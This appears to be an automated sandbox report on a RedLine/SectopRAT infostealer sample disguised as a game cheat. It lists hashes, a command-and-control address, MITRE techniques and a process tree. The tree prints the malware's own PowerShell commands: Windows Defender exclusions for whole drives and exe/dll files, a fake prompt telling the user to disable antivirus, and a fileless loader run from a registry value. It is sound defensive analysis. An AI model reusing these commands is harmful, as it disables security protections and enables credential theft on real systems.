redline | ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c

Analysis

max time kernel
150s
max time network
141s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
09/11/2024, 10:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe
Size

7.3MB
MD5

06293c3726a8b6029225668dcfb8c7e8
SHA1

1db3a38e9cff8b2aec7b73668e6768002c2bddbf
SHA256

ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
SHA512

33a80c1dec409c83d82cb9e1149a90ca11024d726b58b83035ab149b22989c4406cacab57adf6da5ce0d49cb393d4c2fcf58cd2491d0b0c0c5382e06bc35f376
SSDEEP

196608:68waBBQvE8waBBQv36od0Ntiq0rG6MvF:68waB+88waB+/jwtivrr

Score

10^/10

redline sectoprat lucifer defense_evasion discovery evasion execution exploit infostealer persistence rat trojan

Malware Config

Extracted

Family

redline

Botnet

Lucifer

162.55.169.73:49194

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies security service 2 TTPs 3 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4"	services.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000018d68-4.dat	family_redline
behavioral1/memory/1788-16-0x0000000000A00000-0x0000000000A1E000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000018d68-4.dat	family_sectoprat
behavioral1/memory/1788-16-0x0000000000A00000-0x0000000000A1E000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1808 created 432	1808	powershell.EXE	5
PID 3884 created 432	3884	powershell.EXE	5

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2128	powershell.exe
2652	powershell.exe
1656	powershell.exe
1808	powershell.EXE
1408	powershell.EXE
3884	powershell.EXE

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Possible privilege escalation attempt 6 IoCs

exploit

pid	Process
2232	icacls.exe
1784	icacls.exe
3368	takeown.exe
3412	icacls.exe
1944	takeown.exe
2008	takeown.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 6 IoCs

pid	Process
1788	explorer.exe
1056	svchost.exe
2768	windowshost.exe
824	svchost.exe
2384	cominto.exe
956	updater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx	svchost.exe

Loads dropped DLL 7 IoCs

pid	Process
2328	cmd.exe
2164	cmd.exe
1524	cmd.exe
3000	cmd.exe
2872	cmd.exe
2872	cmd.exe
1948	cmd.exe

Modifies file permissions 1 TTPs 6 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1784	icacls.exe
3368	takeown.exe
3412	icacls.exe
1944	takeown.exe
2008	takeown.exe
2232	icacls.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 15 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2840	cmd.exe
1508	powercfg.exe
1652	powercfg.exe
2220	cmd.exe
2160	powercfg.exe
3128	powercfg.exe
764	powercfg.exe
1512	powercfg.exe
2908	powercfg.exe
2968	powercfg.exe
2152	powercfg.exe
1820	powercfg.exe
2460	powercfg.exe
2432	cmd.exe
1764	powercfg.exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfc00C.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh010.dat	WMIADAP.EXE
File opened for modification	C:\Windows\system32\PerfStringBackup.INI	WMIADAP.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\perfc007.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh009.dat	WMIADAP.EXE
File created	C:\Windows\system32\PerfStringBackup.TMP	WMIADAP.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\dialersvc64	svchost.exe
File created	C:\Windows\system32\perfc009.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh00A.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfc011.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfc00A.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh00C.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfc010.dat	WMIADAP.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\perfh007.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh011.dat	WMIADAP.EXE

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3044 set thread context of 552	3044	conhost.exe	92
PID 2912 set thread context of 2520	2912	conhost.exe	93
PID 1808 set thread context of 680	1808	powershell.EXE	131
PID 3884 set thread context of 4056	3884	powershell.EXE	156
PID 2912 set thread context of 2764	2912	conhost.exe	157

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File created	C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini	WMIADAP.EXE
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\inf\WmiApRpl\WmiApRpl.h	WMIADAP.EXE
File opened for modification	C:\Windows\inf\WmiApRpl\WmiApRpl.h	WMIADAP.EXE

Launches sc.exe 45 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3312	sc.exe
2336	sc.exe
2272	sc.exe
2960	sc.exe
1552	sc.exe
960	sc.exe
896	sc.exe
964	sc.exe
2312	sc.exe
2468	sc.exe
1108	sc.exe
3196	sc.exe
2840	sc.exe
2548	sc.exe
2356	sc.exe
2412	sc.exe
2980	sc.exe
2364	sc.exe
2756	sc.exe
3184	sc.exe
1660	sc.exe
2308	sc.exe
1524	sc.exe
2704	sc.exe
1732	sc.exe
2084	sc.exe
2744	sc.exe
1936	sc.exe
3176	sc.exe
2228	sc.exe
620	sc.exe
2844	sc.exe
1380	sc.exe
2248	sc.exe
2768	sc.exe
2608	sc.exe
2740	sc.exe
3064	sc.exe
2232	sc.exe
1700	sc.exe
1548	sc.exe
1800	sc.exe
2816	sc.exe
2920	sc.exe
2932	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	windowshost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 108f604c9532db01	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2896	schtasks.exe
2652	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1656	powershell.exe
2128	powershell.exe
2652	powershell.exe
1696	powershell.exe
1584	powershell.exe
2912	conhost.exe
3044	conhost.exe
1408	powershell.EXE
1808	powershell.EXE
1808	powershell.EXE
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
680	dllhost.exe
3884	powershell.EXE
680	dllhost.exe
680	dllhost.exe
3884	powershell.EXE
680	dllhost.exe
680	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe
4056	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	1788	explorer.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2384	cominto.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeShutdownPrivilege	1652	powercfg.exe
Token: SeShutdownPrivilege	1764	powercfg.exe
Token: SeShutdownPrivilege	2968	powercfg.exe
Token: SeShutdownPrivilege	764	powercfg.exe
Token: SeShutdownPrivilege	1512	powercfg.exe
Token: SeShutdownPrivilege	1820	powercfg.exe
Token: SeDebugPrivilege	2912	conhost.exe
Token: SeDebugPrivilege	3044	conhost.exe
Token: SeShutdownPrivilege	2152	powercfg.exe
Token: SeShutdownPrivilege	2908	powercfg.exe
Token: SeDebugPrivilege	1408	powershell.EXE
Token: SeDebugPrivilege	1808	powershell.EXE
Token: SeDebugPrivilege	1808	powershell.EXE
Token: SeDebugPrivilege	680	dllhost.exe
Token: SeRestorePrivilege	856	svchost.exe
Token: SeShutdownPrivilege	1256	Explorer.EXE
Token: SeAuditPrivilege	856	svchost.exe
Token: SeDebugPrivilege	3884	powershell.EXE
Token: SeDebugPrivilege	3884	powershell.EXE
Token: SeDebugPrivilege	4056	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	856	svchost.exe
Token: SeIncreaseQuotaPrivilege	856	svchost.exe
Token: SeSecurityPrivilege	856	svchost.exe
Token: SeTakeOwnershipPrivilege	856	svchost.exe
Token: SeLoadDriverPrivilege	856	svchost.exe
Token: SeSystemtimePrivilege	856	svchost.exe
Token: SeBackupPrivilege	856	svchost.exe
Token: SeRestorePrivilege	856	svchost.exe
Token: SeShutdownPrivilege	856	svchost.exe
Token: SeSystemEnvironmentPrivilege	856	svchost.exe
Token: SeUndockPrivilege	856	svchost.exe
Token: SeManageVolumePrivilege	856	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	856	svchost.exe
Token: SeIncreaseQuotaPrivilege	856	svchost.exe
Token: SeSecurityPrivilege	856	svchost.exe
Token: SeTakeOwnershipPrivilege	856	svchost.exe
Token: SeLoadDriverPrivilege	856	svchost.exe
Token: SeSystemtimePrivilege	856	svchost.exe
Token: SeBackupPrivilege	856	svchost.exe
Token: SeRestorePrivilege	856	svchost.exe
Token: SeShutdownPrivilege	856	svchost.exe
Token: SeSystemEnvironmentPrivilege	856	svchost.exe
Token: SeUndockPrivilege	856	svchost.exe
Token: SeManageVolumePrivilege	856	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	856	svchost.exe
Token: SeIncreaseQuotaPrivilege	856	svchost.exe
Token: SeSecurityPrivilege	856	svchost.exe
Token: SeTakeOwnershipPrivilege	856	svchost.exe
Token: SeLoadDriverPrivilege	856	svchost.exe
Token: SeSystemtimePrivilege	856	svchost.exe
Token: SeBackupPrivilege	856	svchost.exe
Token: SeRestorePrivilege	856	svchost.exe
Token: SeShutdownPrivilege	856	svchost.exe
Token: SeSystemEnvironmentPrivilege	856	svchost.exe
Token: SeUndockPrivilege	856	svchost.exe
Token: SeManageVolumePrivilege	856	svchost.exe
Token: SeAuditPrivilege	856	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2392	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2348 wrote to memory of 2356	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	30
PID 2348 wrote to memory of 2356	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	30
PID 2348 wrote to memory of 2356	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	30
PID 2348 wrote to memory of 2356	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	30
PID 2348 wrote to memory of 2380	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	31
PID 2348 wrote to memory of 2380	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	31
PID 2348 wrote to memory of 2380	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	31
PID 2348 wrote to memory of 2380	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	31
PID 2348 wrote to memory of 2164	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	33
PID 2348 wrote to memory of 2164	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	33
PID 2348 wrote to memory of 2164	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	33
PID 2348 wrote to memory of 2164	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	33
PID 2348 wrote to memory of 1524	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	34
PID 2348 wrote to memory of 1524	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	34
PID 2348 wrote to memory of 1524	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	34
PID 2348 wrote to memory of 1524	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	34
PID 2348 wrote to memory of 2328	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	35
PID 2348 wrote to memory of 2328	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	35
PID 2348 wrote to memory of 2328	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	35
PID 2348 wrote to memory of 2328	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	35
PID 2348 wrote to memory of 3000	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	39
PID 2348 wrote to memory of 3000	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	39
PID 2348 wrote to memory of 3000	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	39
PID 2348 wrote to memory of 3000	2348	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	39
PID 2328 wrote to memory of 1788	2328	cmd.exe	42
PID 2328 wrote to memory of 1788	2328	cmd.exe	42
PID 2328 wrote to memory of 1788	2328	cmd.exe	42
PID 2328 wrote to memory of 1788	2328	cmd.exe	42
PID 2356 wrote to memory of 1656	2356	cmd.exe	44
PID 2356 wrote to memory of 1656	2356	cmd.exe	44
PID 2356 wrote to memory of 1656	2356	cmd.exe	44
PID 2356 wrote to memory of 1656	2356	cmd.exe	44
PID 2380 wrote to memory of 2128	2380	cmd.exe	45
PID 2380 wrote to memory of 2128	2380	cmd.exe	45
PID 2380 wrote to memory of 2128	2380	cmd.exe	45
PID 2380 wrote to memory of 2128	2380	cmd.exe	45
PID 1524 wrote to memory of 824	1524	cmd.exe	47
PID 1524 wrote to memory of 824	1524	cmd.exe	47
PID 1524 wrote to memory of 824	1524	cmd.exe	47
PID 1524 wrote to memory of 824	1524	cmd.exe	47
PID 2164 wrote to memory of 1056	2164	cmd.exe	46
PID 2164 wrote to memory of 1056	2164	cmd.exe	46
PID 2164 wrote to memory of 1056	2164	cmd.exe	46
PID 2164 wrote to memory of 1056	2164	cmd.exe	46
PID 3000 wrote to memory of 2768	3000	cmd.exe	48
PID 3000 wrote to memory of 2768	3000	cmd.exe	48
PID 3000 wrote to memory of 2768	3000	cmd.exe	48
PID 3000 wrote to memory of 2768	3000	cmd.exe	48
PID 2768 wrote to memory of 2916	2768	windowshost.exe	49
PID 2768 wrote to memory of 2916	2768	windowshost.exe	49
PID 2768 wrote to memory of 2916	2768	windowshost.exe	49
PID 2768 wrote to memory of 2916	2768	windowshost.exe	49
PID 2380 wrote to memory of 2652	2380	cmd.exe	50
PID 2380 wrote to memory of 2652	2380	cmd.exe	50
PID 2380 wrote to memory of 2652	2380	cmd.exe	50
PID 2380 wrote to memory of 2652	2380	cmd.exe	50
PID 2916 wrote to memory of 2872	2916	WScript.exe	52
PID 2916 wrote to memory of 2872	2916	WScript.exe	52
PID 2916 wrote to memory of 2872	2916	WScript.exe	52
PID 2916 wrote to memory of 2872	2916	WScript.exe	52
PID 2872 wrote to memory of 2384	2872	cmd.exe	54
PID 2872 wrote to memory of 2384	2872	cmd.exe	54
PID 2872 wrote to memory of 2384	2872	cmd.exe	54
PID 2872 wrote to memory of 2384	2872	cmd.exe	54

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a0178898-e7ca-4b23-a273-ad4b89da3ccb}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:680
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0561c4be-48ab-4955-b360-e3748093d062}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4056

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Modifies security service
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:604
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1328
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:684
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  - Indicator Removal: Clear Windows Event Logs
  PID:768
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:828
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1180
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:856
- - C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T /R
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:1976
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {148C4242-29EB-4EDC-B5DC-B749D6B605BD} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    PID:2872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1808
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3884
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:976
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:280
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:292
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1076
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1116
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1636
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:1720
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:1064

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256
- C:\Users\Admin\AppData\Local\Temp\ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe
  "C:\Users\Admin\AppData\Local\Temp\ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2348
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2380
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2128
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2652
- - C:\Windows\SysWOW64\cmd.exe
